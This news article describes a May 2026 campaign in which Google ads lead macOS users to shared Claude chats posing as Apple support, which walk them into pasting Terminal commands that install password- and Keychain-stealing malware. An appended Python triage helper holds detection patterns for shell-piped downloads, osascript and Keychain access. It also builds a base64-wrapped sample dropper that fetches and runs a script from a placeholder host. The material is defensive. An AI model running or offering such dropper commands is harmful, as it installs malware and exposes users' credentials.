Google Ads Campaign Redirects Claude Users to Malicious Terminal Commands on macOS

Nancy Tyson  - Tech Writer
Last updated: May 11, 2026
Radar Rundown
  • Attackers abuse Google Ads and Claude.ai chats to trick people searching for Claude downloads into running malicious Terminal commands that install Mac malware.

  • The malware checks for Russian keyboard settings before proceeding, then steals browser passwords, cookies, and Keychain data, using polymorphic delivery to evade detection.

  • The scam hides behind a legitimate destination URL because the criminals placed their instructions inside Claude’s own shared chat feature rather than using a fake website.

Cybercriminals have launched a new scheme that exploits Google’s advertising platform and Anthropic’s Claude sharing feature. The attackers aim to infect Apple computers with data-stealing malware.

People looking for ‘Claude Mac download’ see sponsored search results at the top of Google. Those ads look legitimate because they show claude.ai as the destination website. But clicking leads victims through a malware installation process hidden inside a shared Claude conversation.

Security engineer Berk Albayrak from Trendyol Group uncovered this operation and posted his findings on LinkedIn. A second discovery later revealed another malicious Claude chat that uses different technical infrastructure.

Fake Apple support page walks victims through terminal commands

The criminals created a shared Claude chat that mimics an official installation guide; the document pretends to come from ‘Apple support’ to increase its credibility with potential victims.

Attackers aren’t the only ones eroding trust in AI platforms. Anthropic itself faced user backlash over alleged spyware behavior in its macOS Claude app, a reminder that even legitimate AI tools face scrutiny over their data practices.

The chat provides step-by-step instructions to open a terminal and execute a specific command, which downloads malicious software to the victim’s Mac. Both recently discovered chats are set up in exactly the same way; however, each currently uses a different domain name and delivers its own separate malware payload.

Each time a victim downloads the payload, the server sends a uniquely scrambled version. Security experts call this technique polymorphic delivery. It helps the malware evade detection because the file looks different with every request.

One version of the attack checks the victim’s keyboard settings before proceeding. If the computer uses Russian or CIS-region input sources, the script shuts down immediately and sends a signal to the attacker’s server indicating a blocked installation. Only systems that pass this keyboard-layout filter receive the full payload.

Malware steals passwords and sends them to attackers

The infection script collects several details about the victim’s machine: the external IP address, computer name, operating system version, and keyboard language setting. It transmits all of this information back to the criminals for victim profiling.

One attack variant downloads a second-stage payload and runs it through osascript, the built-in macOS command-line tool for executing AppleScript. This method gives attackers remote control over the victim’s machine without writing a conventional executable to disk.

Another variant skips the profiling step and moves straight to execution. This version steals browser passwords, cookies, and macOS Keychain entries. It packages the stolen data and sends everything to the attacker’s server. Security researchers identified this as a variant of the MacSync information stealer.

Search ads hide the danger behind a real website

This operation differs from typical malvertising campaigns. Older schemes directed users to fake websites that closely mimicked real ones. Here, the Google ad’s destination points to the genuine claude.ai domain.

The criminals placed their malicious instructions inside Claude’s own shared chat feature. Victims never visit a suspicious or fake website. The destination remains completely legitimate throughout the process.

Attackers have used AI platform shared chats for malicious purposes before. In December, another report revealed similar campaigns abusing ChatGPT and Grok. Earlier this year, threat actors ran an identical scheme targeting macOS developers searching for Homebrew.

Claude-focused attacks reach a broader audience than previous campaigns. Non-technical users curious about AI are ideal targets: they rarely question terminal commands or recognize the warning signs of social engineering.

Security experts recommend typing claude.ai directly into the browser address bar instead of clicking sponsored search results. Installation instructions for the real Claude Code CLI come from Anthropic’s official documentation, which never requires users to paste terminal commands from a chat interface. Anyone who sees instructions asking for terminal entries should treat them as suspicious.
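As an added illustration of that last recommendation (example code written for this article, not from the researchers or from Anthropic): a small Python triage helper that unwraps base64-wrapped stages in a pasted command and flags the behaviours the article describes, such as a download piped into a shell, osascript execution, a keyboard-layout probe, host profiling, and Keychain access. The pattern names, the sample commands and the example.invalid hostname are constructed assumptions, not published indicators.

```python
"""Triage a pasted terminal command before running it (added example, not from the article)."""
import base64
import re

# Behaviours the article attributes to the campaign, expressed as triage patterns.
# Pattern names and strings are assumptions for this example, not published indicators.
FINDINGS = [
    ("download piped to shell", re.compile(r"\b(curl|wget)\b.*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    ("base64 decode step", re.compile(r"\bbase64\s+(-d|-D|--decode)\b")),
    ("osascript execution", re.compile(r"\bosascript\b")),
    ("keyboard layout probe", re.compile(r"com\.apple\.HIToolbox|AppleSelectedInputSources")),
    ("host profiling", re.compile(r"\b(sw_vers|scutil\s+--get\s+ComputerName|hostname)\b")),
    ("keychain access", re.compile(r"\bsecurity\s+(find|dump)-[a-z-]+|login\.keychain")),
]
# Long unbroken base64 runs; they are decoded only if they yield printable text.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def _decode_if_text(token: str):
    """Return the decoded text of a base64 token, or None if it is not clean text."""
    try:
        text = base64.b64decode(token, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if all(c.isprintable() or c in "\n\t" for c in text) else None


def expand_base64(cmd: str, max_depth: int = 3) -> str:
    """Replace base64 tokens with their decoded text, repeating for nested layers."""
    for _ in range(max_depth):
        expanded = B64_TOKEN.sub(lambda m: _decode_if_text(m.group(0)) or m.group(0), cmd)
        if expanded == cmd:
            break
        cmd = expanded
    return cmd


def triage_command(cmd: str) -> list:
    """Return the suspicious behaviours found in cmd after unwrapping any base64 layers."""
    expanded = expand_base64(cmd)
    findings = ["base64-encoded stage"] if expanded != cmd else []
    findings += [name for name, rx in FINDINGS if rx.search(expanded)]
    return findings


# Constructed sample: a stage wrapped in base64 so the pasted line reads as harmless noise.
_STAGE = b"curl -fsSL https://example.invalid/install.sh | bash; osascript -e 'do shell script \"id\"'"
SAMPLE_DROPPER = "echo " + base64.b64encode(_STAGE).decode() + " | base64 -d | bash"

if __name__ == "__main__":
    for line in (SAMPLE_DROPPER, "ls -la ~/Downloads"):
        print(line[:60], "->", triage_command(line) or ["nothing flagged"])
```

The checker is a triage aid for a command someone is about to paste, not a replacement for endpoint detection; a clean result only means none of these specific patterns appeared.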
